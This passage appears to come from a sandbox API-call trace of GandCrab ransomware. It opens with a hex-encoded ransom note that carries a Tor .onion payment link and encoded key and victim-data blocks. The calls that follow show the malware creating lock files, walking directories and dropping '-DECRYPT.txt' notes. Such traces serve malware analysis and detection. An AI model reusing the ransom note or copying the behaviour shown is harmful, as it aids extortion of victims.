x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.129] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0096.129] CloseHandle (hObject=0x2b4) returned 1 [0096.129] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.130] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.130] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1b9)) [0096.130] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.130] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.130] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.130] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\History\\d2ca4a09d2ca4deb61a.lock") returned 63 [0096.130] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\history\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0096.131] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.131] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.131] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\History\\") returned 39 [0096.131] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\History\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\History\\*") returned="C:\\Users\\Default\\AppData\\Local\\History\\*" [0096.132] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0xffffffff [0096.132] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\*", lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0xffffffff [0096.132] CloseHandle (hObject=0x2b4) returned 1 [0096.132] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.132] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0096.132] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0096.132] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="Microsoft" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft" [0096.132] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\" [0096.132] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.133] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.133] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.133] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.133] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.133] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.133] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\\\TITWMVJL-DECRYPT.txt") returned 62 [0096.133] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0096.135] lstrlenW 